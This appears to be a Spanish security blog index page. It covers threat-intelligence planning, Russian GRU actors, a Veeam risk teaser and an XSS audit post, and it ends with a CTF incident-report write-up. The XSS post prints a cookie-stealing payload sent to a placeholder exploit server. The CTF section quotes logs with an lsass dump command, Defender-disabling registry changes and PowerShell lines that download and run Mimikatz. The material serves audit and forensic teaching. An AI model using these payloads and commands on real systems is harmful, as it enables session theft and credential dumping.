Planificación en Threat Intelligence: Plan de Adquisición

Una vez definidos los requisitos de inteligencia por parte de las audiencias, debe planificarse el resto de las tareas involucradas en el Ciclo de Inteligencia. Entre las más relevantes está la identificación de las fuentes de información y la disponibilidad de los recursos y capacidades para su adquisición en tiempo y forma. Estas tareas se ejecutan en la fase de adquisición.

La adquisición es la fase del proceso de inteligencia donde el dato de interés es obtenido desde distintas fuentes, tanto abiertas como cerradas, o técnicas o humanas.

En el siguiente artículo se especificará una aproximación para la estructuración de las tareas de adquisición, estableciendo los alcances identificados en artículos anteriores mediante los PIR.

Alcance de las tareas de adquisición

La identificación de los Priority Intelligence Requirements como paso previo permite la selección de los objetivos de la tarea de adquisición a través de los EEI.

Es precisamente parte de la planificación de esta etapa la identificación de qué fuentes de información permiten la adquisición de dichos EEI.

Sin embargo, el objetivo de la fase de adquisición, como disparador de todo el proceso de inteligencia, se ve muy alineado con un concepto comentado en el artículo anterior, que es el tiempo de oportunidad. Esto impacta en que el producto de inteligencia sea de utilidad con suficiente antelación como para que el trabajo del equipo de inteligencia sea diferencial para la audiencia.

Por ello la rapidez con la que se realizan las labores de adquisición sea una parte fundamental en conseguir que el producto de inteligencia esté dentro del tiempo de oportunidad, consiguiendo una utilidad real del proceso. A continuación, se definirán una serie de elementos que permitirán una correcta planificación, alcance y automatización de dicha fase, cuestión no sólo son fundamental para la calidad del producto, sino especialmente para su utilidad.

[Read more…]

Planificación en Threat Intelligence: Requisitos

Dado que la inteligencia de amenazas tiene el objetivo de proporcionar una inteligencia del adversario en el ciberespacio para la toma de decisiones de la audiencia, qué tipo de análisis o productos deben realizarse dentro de un equipo de Threat Intelligence debe estar adaptado a las necesidades de su audiencia buscando así maximizar su utilidad. De esto modo, se toma el conjunto de necesidades presentadas por cada una de ellas y, a través de los recursos disponibles, se definen los tipos de procesos, flujos y productos que permiten darles respuesta. Son dichas necesidades las que la doctrina define bajo el término de Priority Intelligence Requirements (PIR).

Los Priority Intelligence Requirements son el marco de trabajo para el equipo de inteligencia por lo que, debido a su importancia, éstos deben ser correctamente definidos a través de ciertas características que se comentarán a lo largo del artículo.

Priority Intelligence Requirements

Los PIR son aquellas directrices facilitadas por la audiencia y que determinan el alcance de la inteligencia que necesitan para su toma de decisiones. El objetivo de los PIR es proporcionar información de calidad para la toma de decisiones que sea oportuna, integrada, analizada, predictiva y que responda al “¿y eso qué?” para orientar la planificación y apoyar las operaciones.[1] En consecuencia, la definición de los PIR permite al equipo de inteligencia estructurar el equipo de inteligencia de manera que adecuen cada una de las etapas para maximizar la eficiencia del producto entregado.

Si un PIR no está correctamente definido puede derivar en una situación donde el tiempo y los recursos necesarios para todo el proceso de inteligencia no han ido dedicados a un producto útil para la audiencia. Por ello, el primer paso para el correcto desempeño de un equipo de inteligencia es establecer el fin de cada uno de los procesos de inteligencia.

Un ejemplo de Priority Intelligence Requirement en Threat Intelligence pueden ser Capacidades para la detección de Tácticas, Técnicas y Procedimientos empleados por actores de ciberespionaje contra Europa o Tendencias de actores de ransomware.

[Read more…]

Planificación en Threat Intelligence: Definiciones

La ciberinteligencia es una disciplina que, aún siendo cada vez más necesaria en los procesos de seguridad, sigue sin tener los métodos y procesos estructurados para la correcta implementación en una organización. Actualmente, la comprensión de cuál debe ser la función de un equipo de ciberinteligencia y qué tipo de inteligencia debe proporcionar a las audiencias representa un conjunto muy complejo y diverso, especialmente por las diferencias que representa el dominio del ciberespacio respecto el dominio físico. Un ejemplo es su propia definición, la cual no existe un consenso unificado, respondiéndose en términos no alineados o incluso contrapuestos.

La siguiente serie de artículos pretende conformar una visión unificada con respecto a la teoría establecida hasta la fecha, abordando la planificación de los procesos de threat intelligence de manera operativa para su implantación en los sistemas de seguridad de una organización.

En este artículo se establecerá el conjunto de definiciones sobre las que se fundamentará la definición de los procesos y alcances del proceso de inteligencia de amenazas.

Ciberinteligencia

La ciberinteligencia no puede definirse como una disciplina de adquisición, es decir, un equivalente a OSINT o SIGINT, sino que se trata de una disciplina analítica, es decir, la inteligencia relativa al ciberespacio.[1] Por ello, los enfoques para su definición parte de conceptos previamente integrados en los procesos de inteligencia convencional.

El documento de la OTAN AJP-2 define la inteligencia como el producto resultante de la recopilación y el procesamiento dirigidos de información sobre el entorno, las capacidades y las intenciones de los actores, con el fin de identificar amenazas y ofrecer oportunidades para su explotación por parte de los responsables de la toma de decisiones.[2]

Tal y como se puede observar, el documento habla sobre el entorno donde ocurren las hostilidades, así como la información relativa a la amenaza. También ocurre así en el Joint Publication 2-0, donde caracteriza la inteligencia bajo dos perspectivas, la inteligencia del territorio de operaciones y la inteligencia sobre el adversario.[3]

[Read more…]

Comportamiento de un XSS y CSRF, ¿Por qué el mismo payload funciona en un navegador y en otro no?

1. XSS

En una de las auditorías que realizamos desde S2GRUPO me topé con una página web vulnerable a XSS y CSRF.

En relación al XSS se logró con éxito el ataque en una entrada de datos que no sanitizaba correctamente los caracteres “,/ y > entre otros, temiéndome lo peor fui directamente a probar los payloads que mayor impacto poseían en cuánto a robo de información, por lo que con el payload %27%22()%26%27%3Cstring%3E%3CScRiPt%3Eeval(atob(%27ZmV0Y2goJ2hedHBz0i8vejc3YnhzMGxkemdndWNvODhzaGg4Z3V6M3E5aHg3bHcub2FzdGlmeS5jb20vP2Nvb2tpZVZpY3RpbWE9Jytkb2N1bWVudC5jb29raWUp%27))%3C/ScRiPt%3E, dónde el texto en base 64 es fetch(‘http://EXPLOIT.server/?cookieVictim=’+document.cookie) se conseguían exfiltrar las cookies de la propia web a un servidor externo controlado por S2grupo una vez la víctima una vez autenticada en la web clicaba en el enlace.

Una vez hallada esta vulnerabilidad, seguí los mismos pasos para desencadenar el XSS en navegadores como Mozilla Firefox, Chrome, brave y Microsoft Edge, de esta manera me haría una idea de cuál sería el motivo por el que las cookies no llegan al servidor de explotación en caso de que la víctima clicase en el enlace malicioso.

Cómo se puede apreciar en la siguiente ilustración, se consiguen las cookies una vez una supuesta víctima haya clicado en el enlace, en este caso el navegador utilizado es Microsoft Edge.

Sin embargo, en un navegador como Brave se puede apreciar como estas cookies nunca llegan al parámetro personalizado cookieVictim.

[Read more…]

Nuevo libro YA disponible: Cyber GRU. Russian military intelligence in cyberspace

Por fin, CYBER GRU: Russian military intelligence in cyberspace, el nuevo libro que anunciaba hace unos días, se publicó el pasado 4 de julio. En el post anterior, presentaba la estructura del libro y la tabla de contenidos. Tanto la editorial como la imprenta han sido rápidos, y está listo antes de lo esperado. Como dije, este libro intenta arrojar algo de luz sobre las actividades en el ciberespacio de uno de los servicios de inteligencia más capaces y opacos del mundo: el GRU ruso.

La edición en papel del libro está disponible en Amazon, en modo impresión bajo demanda, y también directamente de la web de Naullibres. Según mi editor, imprimir el libro localmente y enviarlo después fuera de España haría que el precio fuera demasiado elevado por los gastos de envío. Como curiosidad, la edición impresa bajo demanda en Amazon tiene alguna pequeña diferencia si la comparamos con la local. En primer lugar, está completamente en blanco y negro, mientras que la edición local incluye alguna página en color, nada especialmente significativo. En segundo lugar, la edición local es algo más pequeña (150 × 225 mm) y la de Amazon un poco más grande (152.4 × 228.6 mm, o lo que es lo mismo, 6 × 9 pulgadas). Esto es debido a que Amazon sólo permite ciertos tamaños para su impresión bajo demanda. No son diferencias importantes, simplemente pequeños ajustes que tienes que tener en cuenta cuando trabajas con editoriales. Simplemente FYI.

Por supuesto, este libro ha sido escrito en LaTeX. Una vez acabado no quería invertir tiempo convirtiéndolo a un formato de libro electrónico como EPUB, así que el formato electrónico es PDF, con sus pros y sus contras. Aunque hay herramientas que automáticamente producen estos formatos, generar un libro electrónico decente no es inmediato. Sin embargo, Amazon no acepta libros electrónicos en PDF, por lo que si estás interesado en la versión digital del libro (mucho más barata), tienes que obtenerla vía Google Books.

Resumiendo:

Esto de las ediciones, las impresiones y demás es algo caótico para los que no trabajamos en ese mundo. En cualquier caso, espero que disfrutéis leyendo este libro tanto como yo he disfrutado escribiéndolo. Sentíos libres de enviarme cualquier comentario constructivo para su posible inclusión en una futura segunda edición del libro, si es que algún día decido escribirla (ahora, desde luego, no). ¡Disfrutad!

CYBER GRU: Russian military intelligence in cyberspace

Hoy he enviado a imprenta un nuevo trabajo titulado CYBER GRU: Russian military intelligence in cyberspace. Como su título indica, se trata un libro donde hablo del GRU en el ciberespacio, finalizado en mayo y que, tras unos retoques y un prólogo, está imprimiéndose para llegar a librerías, físicas y virtuales, en aproximadamente un mes. Sus casi 400 páginas recogen el trabajo de muchas noches y fines de semana de los últimos meses, sobre una base de material que ya tenía escrito sobre el GRU, incluyendo algún apartado que ya había sido publicado en este blog.

Para hablar del GRU en el ciberespacio, el libro establece en primer lugar conceptos básicos tanto de seguridad, inteligencia y defensa, como de ciberseguridad, ciberinteligencia y ciberdefensa. Posiblemente, estos conceptos sean de sobra conocidos por los que trabajamos en este ámbito, pero no para todo el mundo, y son necesarios para entender el resto del trabajo. De la misma forma, establece los conceptos necesarios para entender Rusia y su ecosistema de inteligencia, donde agencias oficiales trabajan junto a empresas, ciudadanos e incluso grupos delincuenciales.

Con las bases establecidas, nos adentramos en el GRU, el más opaco de los servicios rusos (antes, soviéticos), analizando su organización, estructura, mentalidad… y, en especial, sus capacidades de inteligencia de señales y operaciones de información, las disciplinas más directamente relacionadas con lo que hoy conocemos como operaciones en el ciberespacio. Y, obviamente, es este ciberespacio el que concentra la mayor parte del contenido del libro: las unidades militares más relevantes, los principales grupos APT, las relaciones del GRU con terceros actores, sus tácticas y técnicas, su arsenal e infraestructura y sus capacidades y operaciones principales.

A continuación, para concluir el libro, se detalla el camino entre la inteligencia y la detección de una amenaza, en el que se incluye la atribución, y que trata de explicar cómo a partir de unos indicadores, generalmente de bajo nivel, es posible pivotar hasta un conocimiento más amplio del actor hostil, sus objetivos, sus tácticas y técnicas y sus herramientas. El trabajo se cierra con las principales conclusiones y algunas opiniones propias. Se incluyen también unos apéndices, siendo el principal el dedicado al GRU en España: qué hace, o intenta hacer, y por qué.

Antes de finalizar, quiero dar las gracias públicamente al teniente general retirado Rafael COMAS, por su amabilidad al escribir el prólogo para este trabajo. Además de que Rafa es un experto en muchos de los temas abordados en este libro, sé que, tratando algunos temas espinosos, este tipo de contenidos en ocasiones son difíciles de prologar, por lo que el agradecimiento es aún mayor.

Espero que este trabajo ayude a conocer un poco mejor las actividades en el ciberespacio de uno de los mejores y más opacos servicios de inteligencia del mundo. En breve avisaremos de su publicación. De momento, os dejo por aquí la tabla de contenidos.

Algunas reflexiones sobre Laundry Bear

Ayer, la inteligencia holandesa (AIVD and MIVD) y Microsoft publicaron dos informes destallando a un actor hostil ruso, potencialmente nuevo: Laundry Bear, o Void Blizzard. Este actor ha sido descubierto gracias a un compromiso reciente de la policía holandesa, pero sus actividades han estado también dirigidas a organizaciones occidentales desde, al menos, 2024, incluyendo fuerzas armadas, organizaciones gubernamentales y contratistas de defensa, entre otros. A pesar de que la inteligencia holandesa destaca que no se ha podido realizar la foto completa de este grupo y sus actividades, han publicado su informe para alertas a sus aliados (¡como debe ser!).

Laundry Bear no ejecuta operaciones de ataque, solamente de explotación. En otras palabras, ciber espionaje. Y ejecuta estas actividades de espionaje abusando de entornos de correo en la nube, en particular de servidores Microsoft Exchange, a través de cuentas comprometidas, sin elevar privilegios. Simplificando, Laundry Bear obtiene unas credenciales válidas, por ejemplo, del mercado negro, y las usa para robar correos electrónicos y algunos ficheros.

Los objetivos geográficos de Laundry Bear incluyen “Occidente”: la Unión Europea y la OTAN. Otras regiones en el punto de mira del actor son el lejano Oriente y Asia central, aunque parecen residuales. En los países de la Unión Europea y la OTAN, Laundry Bear se focaliza en sectores relevantes para los intereses rusos en Ucrania, en particular en el sector defensa: ministerios de Defensa, ministerios de Asuntos Exteriores, contratistas de defensa, etc. Laundry Bear está interesado en la producción militar y, según la inteligencia holandesa, parece tener cierto grado de conocimiento sobre la producción y suministro de productos militares y sus dependencias.

Más allá del ámbito militar, Laundry Bear también ha puesto en su punto de mira a organizaciones y negocios civiles, en particular del sector de la alta tecnología, que a su vez podrían estar relacionados con el ámbito gubernamental y el militar. El grupo también tiene como objetivos infraestructuras críticas, organizaciones no gubernamentales, partidos políticos, medios de comunicación y entornos sanitarios o educativos, entre otros, siempre con objetivos de espionaje.

Las operaciones de Laundry Bear son ágiles, muy probablemente gracias a cierto grado de automatización, organizado eficientemente y con un gran número de compromisos exitosos. Como cualquier actor hostil, para ejecutar estas operaciones Laundry Bear desarrolla un conjunto de tácticas y técnicas. Las técnicas asociadas son simples. Laundry Bear no usa malware personalizado, y por supuesto tampoco explota vulnerabilidades de día cero. El actor usa técnicas Living-off-the-Land, incluyendo password spraying (aprovechando credenciales robadas que han sido publicadas tras fugas de datos). Una vez que ha obtenido acceso, Laundry Bear descarga información sin elevar privilegios, incluyendo la Global Address List (GAL) de Microsoft Exchange. La GAL permite al actor moverse lateralmente obteniendo acceso a otras cuentas del servidor, de nuevo a través de password spraying. Adicionalmente al robo de correos electrónicos, Laundry bear puede explotar vulnerabilidades conocidas de servidores Sharepoint para robar información.

La inteligencia holandesa afirma que los vectores de ataque utilizados por Laundry Bear, con técnicas no especialmente complejas, dificultan la atribución. Han identificado ciertas similitudes entre las operaciones de Laundry Bear y el modus operandi de APT28. Sin embargo, concluyen que Laundry Bear y APT28 son dos actores diferentes. Por su parte, Microsoft relaciona los objetivos de Laundry Bear con los de APT28 y con los de Sandworm Team.

A partir de la información publicada por la inteligencia holandesa y por Microsoft, y estando de acuerdo en que las técnicas simples usadas por Laundry Bear dificultan su atribución, podemos afirmar que:

  • Casi con total certeza, Laundry Bear es un actor hostil ligado al gobierno ruso. Los sectores y países objetivo están alineados con los intereses rusos, de nuevo con un foco en Ucrania. Además, el encontrar ONG entre los objetivos del grupo es compatible con actores hostiles estratégicamente motivados, particularmente con actores estado.
  • Probablemente, Laundry Bear está asociado al GRU ruso. Su interés especial en el ámbito militar, y su conocimiento acerca de este mercado, incrementan la probabilidad de que este actor esté ligado a la inteligencia militar. Sin embargo, otros actores rusos no ligados al GRU también tienen entre sus objetivos al ámbito militar, como Turla o Gamaredon (FSB) o APT29 (SVR).
  • La probabilidad de que Laundry Bear sea un nuevo actor hostil es media. Las técnicas simples usadas por Laundry Bear son comúnmente usadas por otros actores, incluyendo avanzados. A partir de la información publicada, no se puede afirmar con un grado de certeza elevado que nos estemos enfrentando a un nuevo actor hostil.

En resumen, Laundry Bear (o Void Blizzard) es un actor hostil ruso, probablemente ligado al GRU, pero no está claro si es un nuevo grupo o está asociado a las unidades “ciber” de la inteligencia rusa (en particular, a las unidades 26165, 74455 o 29155 del GRU). Estamos seguros de que pronto la inteligencia holandesa, o Microsoft, publicarán nueva inteligencia sobre este actor hostil.

Veeam Backup: De seguro de la organización a llave maestra del atacante

Muchos de vosotros seguro que conoceréis Veeam Backup, la solución de protección de datos que permite realizar copias de seguridad y recuperaciones en entornos virtuales, físicos, NAS y nativos de la nube. Esto se debe a que su facilidad de uso y eficiencia lo han convertido en un pilar fundamental en la estrategia de backup de muchas organizaciones.

En un contexto donde los ataques de ransomware están a la orden del día, Veeam Backup se ha consolidado como una herramienta esencial para la continuidad del negocio y la resiliencia ante la nueva oleada de amenazas que reciben las organizaciones de hoy en día.

Sin embargo, ¿qué pasaría si esta solución de protección se convirtiera en la puerta de entrada para un actor malicioso?

Una de las grandes ventajas de Veeam Backup es su capacidad para integrarse fácilmente con otras soluciones clave en entornos IT. Es común verlo conectado con vSphere, la plataforma de virtualización de VMware, o con sistemas NAS, utilizados para el almacenamiento de datos en red.

Además de ello, su compatibilidad con múltiples soluciones cloud ampliamente utilizadas, como es el caso de Azure, lo convierte en una pieza fundamental para la gestión eficiente y segura de copias de seguridad en la nube.

En el mundo IT, la automatización de tareas, especialmente cuando involucra la integración entre distintos softwares, conlleva beneficios significativos. Sin embargo, también implica ciertas condiciones, en su mayoría relacionadas con el proceso de autenticación. Es fundamental evaluar estos aspectos, ya que pueden influir en la seguridad, el control de acceso y la privacidad de los datos, por lo que es necesario sopesar sus ventajas y posibles riesgos antes de implementarlos.

[Read more…]

Baklava CTF Writeup – Incident Report Style (IV)

  1. ¡WARNING! ¡LÉEME PRIMERO!
  2. Resumen ejecutivo.
  3. Antecedentes.
  4. Gestión del incidente
    • 4.1. DC02 – 192.168.20.46
    • 4.2. WS02 – 192.168.20.42
    • 4.3. WS01 – 192.168.20.41
    • 4.4. SRV01
  5. Conclusiones finales.
  6. Línea temporal del ataque.
  7. Impacto.
  8. Atribución.
  9. Lecciones aprendidas.
  10. Anexo A: IOC.
  11. FAQ (del meta, no del incidente).

SRV01

Dado que es un activo crítico para la Organización, se solicita por su parte un análisis forense del servidor.

Se procesan en primer lugar los logs de eventos por Hayabusa, obteniendo los siguientes resultados de interés:

./hayabusa-2.17.0-lin-x64-gnu csv-timeline -d ../Logs -o ../hayabusa_srv01.csv

╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤

| Top high alerts:    │

╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤

│ Suspicious Eventlog Clearing or Configuration Change Activity (267) │

│ Process Memory Dump Via Comsvcs.DLL (3)   │

│ ETW Trace Evasion Activity (2)            │

│ Lsass Memory Dump via Comsvcs DLL (2)     │

│ Disable Windows Defender Functionalities Via Registry Keys (2)  |

╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤

Si se investigan las alertas, parece que los atacantes han creado el servicio abjtTGiR, con el objetivo de volcar la memoria del proceso lsass.exe (y de esta forma poder acceder a los hashes de las credenciales):

2024-03-22 13:07:20.583 +01:00        Service Binary in Suspicious Folder           high       SRV01.megacorp.local  Sysmon         13           23869    EventType: SetValue ¦ RegKey: HKLM\System\CurrentControlSet\Services\abjtTGiR\ImagePath ¦ Details: %%COMSPEC%% /Q /c CMD.Exe /Q /c for /f “tokens=1,2 delims= ” ^%%A in (‘”tasklist /fi “Imagename eq lsass.exe” | find “lsass””‘) do rundll32.exe C:\windows\System32\comsvcs.dll, #+0000^24 ^%%B \Windows\Temp\JuyTiUv5g.ico full ¦ Proc: C:\Windows\system32\services.exe ¦ PID: 636 ¦ PGUID: 5CD2ED58-580B-65FC-0B00-000000001300 ¦ User: NT AUTHORITY\SYSTEM       RuleName: T1031,T1050 ¦ UtcTime: 2024-03-22 12:07:20.573

2024-03-22 13:07:20.813 +01:00        Process Memory Dump Via Comsvcs.DLL              high       SRV01.megacorp.local         Sysmon 1              23870    Cmdline: C:\Windows\system32\cmd.exe /Q /c CMD.Exe /Q /c for /f “tokens=1,2 delims= ” ^%%A in (‘”tasklist /fi “Imagename eq lsass.exe” | find “lsass””‘) do rundll32.exe C:\windows\System32\comsvcs.dll, #+0000^24 ^%%B \Windows\Temp\JuyTiUv5g.ico full ¦ Proc: C:\Windows\System32\cmd.exe ¦ User: NT AUTHORITY\SYSTEM ¦ ParentCmdline: C:\Windows\system32\services.exe ¦ LID: 0x3e7 ¦ LGUID: 5CD2ED58-580B-65FC-E703-000000000000 ¦ PID: 4420 ¦ PGUID: 5CD2ED58-7478-65FD-700B-000000001300 ¦ ParentPID: 636 ¦ ParentPGUID: 5CD2ED58-580B-65FC-0B00-000000001300 ¦ Description: Windows Command Processor ¦ Product: Microsoft® Windows® Operating System ¦ Company: Microsoft Corporation ¦ Hashes: MD5=911D039E71583A07320B32BDE22F8E22,SHA256=BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527,IMPHASH=272245E2988E1E430500B852C4FB5E18         CurrentDirectory: C:\Windows\system32\ ¦ FileVersion: 10.0.17763.1697 (WinBuild.160101.0800) ¦ IntegrityLevel: System ¦ OriginalFileName: Cmd.Exe ¦ ParentImage: C:\Windows\System32\services.exe ¦ RuleName: – ¦ TerminalSessionId: 0 ¦ UtcTime: 2024-03-22 12:07:20.811

De forma adicional, vía Sysmon se observa que los atacantes han manipulado la configuración de Windows Defender:

2024-03-22 13:06:46.123 +01:00        Disable Windows Defender Functionalities Via Registry Keys        high         SRV01.megacorp.local  Sysmon 13           23854    EventType: SetValue ¦ RegKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring ¦ Details: DWORD (0x00000001) ¦ Proc: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24020.7-0\MsMpEng.exe ¦ PID: 6832 ¦ PGUID: 5CD2ED58-5AD7-65FC-5E01-000000001300 ¦ User: NT AUTHORITY\SYSTEM         RuleName: T1089,Tamper-Defender ¦ UtcTime: 2024-03-22 12:06:46.121

2024-03-22 13:06:48.887 +01:00        Disable Windows Defender Functionalities Via Registry Keys        high         SRV01.megacorp.local  Sysmon 13           23861    EventType: SetValue ¦ RegKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Spynet\SpyNetReporting ¦ Details: DWORD (0x00000000) ¦ Proc: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24020.7-0\MsMpEng.exe ¦ PID: 6832 ¦ PGUID: 5CD2ED58-5AD7-65FC-5E01-000000001300 ¦ User: NT AUTHORITY\SYSTEM RuleName: T1089,Tamper-Defender ¦ UtcTime: 2024-03-22 12:06:48.887

Se confirma la acción de los atacantes en los log de eventos de Windows Defender:

Nombre de registro:Microsoft-Windows-Windows Defender/Operational

Origen:        Microsoft-Windows-Windows Defender

Fecha:         22/03/2024 13:06:47

Id. del evento:5001

Categoría de la tarea:Ninguno

Nivel:         Información

Palabras clave:

Usuario:       SYSTEM

Equipo:        SRV01.megacorp.local

Descripción:

Se deshabilitó el examen de Protección en tiempo real de Microsoft Defender Antivirus para detectar malware y otro software potencialmente no deseado.

Nombre de registro:Microsoft-Windows-Windows Defender/Operational

Origen:        Microsoft-Windows-Windows Defender

Fecha:         22/03/2024 13:06:49

Id. del evento:5007

Categoría de la tarea:Ninguno

Nivel:         Información

Palabras clave:

Usuario:       SYSTEM

Equipo:        SRV01.megacorp.local

Descripción:

La configuración de Microsoft Defender Antivirus cambió. Si es un evento inesperado, debe revisar la configuración porque puede deberse a malware.

         Valor anterior: HKLM\SOFTWARE\Microsoft\Windows Defender\SpyNet\SpyNetReporting = 0x2

         Valor nuevo: HKLM\SOFTWARE\Microsoft\Windows Defender\SpyNet\SpyNetReporting = 0x0

Nombre de registro:Microsoft-Windows-Windows Defender/Operational

Origen:        Microsoft-Windows-Windows Defender

Fecha:         22/03/2024 13:06:49

Id. del evento:5007

Categoría de la tarea:Ninguno

Nivel:         Información

Palabras clave:

Usuario:       SYSTEM

Equipo:        SRV01.megacorp.local

Descripción:

La configuración de Microsoft Defender Antivirus cambió. Si es un evento inesperado, debe revisar la configuración porque puede deberse a malware.

         Valor anterior: N/A\SpyNet\LastMAPSFailureTimeString =

         Valor nuevo: HKLM\SOFTWARE\Microsoft\Windows Defender\SpyNet\LastMAPSFailureTimeString = 2024-03-22T12:06:49Z

Se investiga cómo han podido acceder los atacantes al equipo, encontrando dos accesos del usuario sqladmin vía Escritorio Remoto:

Nombre de registro:Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational

Origen:        Microsoft-Windows-TerminalServices-RemoteConnectionManager

Fecha:         22/03/2024 13:45:45

Id. del evento:1149

Usuario:       Servicio de red

Equipo:        SRV01.megacorp.local

Descripción: Servicios de Escritorio remoto: autenticación de usuario correcta:

Usuario: sqladmin

Dominio: megacorp

Dirección de red de origen: 10.0.8.25

[Nota: esta conexión es un residuo del CTF, no hay que tenerla en cuenta].

Nombre de registro:Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational

Origen:        Microsoft-Windows-TerminalServices-RemoteConnectionManager

Fecha:         22/03/2024 13:05:57

Id. del evento:1149

Usuario:       Servicio de red

Equipo:        SRV01.megacorp.local

Descripción:Servicios de Escritorio remoto: autenticación de usuario correcta:

Usuario: sqladmin

Dominio:

Dirección de red de origen: 192.168.20.42

El primer acceso se produce justo antes de la actividad maliciosa ya observada del usuario sqladmin, lo que confirma que el ataque de Kerberoasting contra la cuenta sqladmin ha sido exitoso, y que la contraseña no era robusta ya que ha sido rota en cuestión de minutos.

Se analiza la MFT del servidor, centrándonos en los ficheros creados o modificados el 22/03/2024, encontrando un fichero de interés:

2024-03-22 12:06:38                2024-03-22 12:06:38      2024-03-22 12:06:38       2024-03-22 12:06:38       154         lnk         \Users\sqladmin\AppData\Roaming\Microsoft\Windows\Recent\windowsdefender—.lnk

Se recupera el .lnk de la carpeta de recientes del usuario sqladmin, y se pasa por la herramienta LECmd.exe, obteniendo el siguiente resultado:

LECmd version 1.5.0.0

Processing C:\Users\antonio\Desktop\windowsdefender—.lnk

Extra data found in ftp case

Source file: C:\Users\antonio\Desktop\windowsdefender—.lnk

  Source created:  2024-12-01 12:17:57

  Source modified: 2024-03-22 12:06:38

  Source accessed: 2024-12-01 12:18:37

— Target ID information (Format: Type ==> Value) —

  Absolute path: Internet Explorer (Homepage)\windowsdefender:///

  -Root folder: GUID ==> Internet Explorer (Homepage)

  -URI ==> windowsdefender:///

Los atacantes han lanzado desde Edge un acceso directo a la Seguridad del servidor, posiblemente para ver si podían deshabilitarlo.

Así mismo, se confirma la ejecución del ransomware al aparecer tanto la nota de rescate como ficheros cifrados:

2024-03-22 12:34:43                2024-03-22 12:37:53      2024-03-22 12:37:53       2024-03-22 12:37:53       1576      txt         \files\readme.txt

2024-03-22 12:34:53                2024-03-22 12:34:53      2024-01-23 11:26:30       2024-03-22 12:34:53       2097184         baklava \files\confidential\conf-2024-1.docx.baklava

Si se buscan los ficheros modificados por el usuario sqladmin el 22/03/2024, se encuentra en el fichero C:\Users\sqladmin\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt el historial de ejecución de Powershell, donde se observa el uso de Mimikatz para acceder a las credenciales del equipo:

Invoke-WebRequest -Uri https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 -UseBasicParsing | Invoke-Expression

add-objectacl

whoami

IEX (New-Object System.Net.Webclient).DownloadString(‘https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1’)

Invoke-Mimikatz -Command ‘”privilege::debug” “token::elevate” “sekurlsa::logonpasswords”‘

IEX (New-Object System.Net.Webclient).DownloadString(‘https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1’)

Invoke-Mimikatz -Command ‘”privilege::debug” “token::elevate” “sekurlsa::logonpasswords”‘

ipconfig

Se concluye que los atacantes han llevado a cabo las siguientes acciones:

  1. Deshabilitado el antivirus Windows Defender.
  • Realizado un volcado de la memoria del proceso lsass.exe con la herramieta Mimikatz, con el fin de obtener las credenciales de los usuarios que habían iniciado sesión.
  • Iniciado sesión por Escritorio Remoto con el usuario sqladmin.

Conclusiones finales

Los análisis forenses realizados permiten resumir el ataque en las siguientes fases:

  1. En primer lugar, los atacantes envían un correo malicioso al usuario m.shutter (equipo WS01), conteniendo un enlace para la descarga de un fichero malicioso.
  • El fichero, al ser abierto, compromete el equipo con la herramienta de post-explotación Havoc y lanza un fichero PDF señuelo.
  • En WS01 existe una tarea que se ejecuta con privilegios y que está en un directorio sin restricciones. Los atacantes modifican dicha tarea para ejecutar un script de Powershell que les permite escalar privilegios.
  • Los atacantes dejan una persistencia en el inicio del usuario mshutter (script en el Startup) y localizan el equipo WS02, al que copian el fichero update.ps1 (otra copia de Havoc) y lo ejecutan vía PsExec comprometiendo dicho equipo.
  • En WS02 dejan de nuevo persistencia (en este caso vía una tarea programada), y realizan con la herramienta Rubeus un ataque de Kerberoasting contra la cuenta de sqladmin. 
  • Dado que inician sesión con el usuario sqladmin en SRV01 poco después, se asume que dicha contraseña ha sido vulnerable a un ataque de fuerza bruta. En este servidor los atacantes deshabilitan de forma manual el antivirus Windows Defender y proceden a volcar las credenciales en memoria con la herramienta Mimikatz.
  • Los atacantes parecen disponer al momento de las credenciales de los usuarios helpdesk y Administrador (se sospecha un posible ataque de Pass-the-Hash). Estos accesos son empleados para realizar una copia del Directorio Activo mediante el ataque DC Sync y para crear la cuenta administrad0r y hacerla administrador del dominio.
  • Los atacantes inician sesión por Escritorio Remoto con esta cuenta en DC02, instalan FIleZilla y lo emplean tanto para exfiltrar una BD de contraseñas de KeePass como para descargarse el ransomware PsRansom
  • El ataque termina con los atacantes detonando el ransomware y cifrando ficheros en SRV01.

Acciones de erradicación y recuperación

Se recomiendan las siguientes acciones de erradicación y recuperación:

  1. Búsqueda de todos los IOC en la infraestructura de la Organización, principalmente los relacionados con el C2 de Havoc y los nombres de los ficheros Powershell maliciosos.
  • Borrado de todos los ficheros maliciosos encontrados en los distintos equipos.
  • Cambio de contraseñas de todos los usuarios privilegiados de la Organización, haciendo especial hincapié en que se sigan unos criterios de robustez de las mismas. La misma acción debe llevarse a cabo con las cuentas de servicio.
  • Cambio de todas las contraseñas existentes en el fichero KeePass robado por los atacantes.
  • Cambio de contraseñas de todos los usuarios de la Organización (se recuerda que los ataques se han llevado una copia del Directorio Activo, por lo que tienen acceso a todos los hashes de las contraseñas, que pueden ser rotos con un ataque de fuerza bruta).
  • Restauración de las copias de seguridad de DC02 y SRV01 a un estado anterior al 22/03/2024 a las 12:00h UTC
  • Reinstalación completa de los puestos de usuario WS01 y WS02.

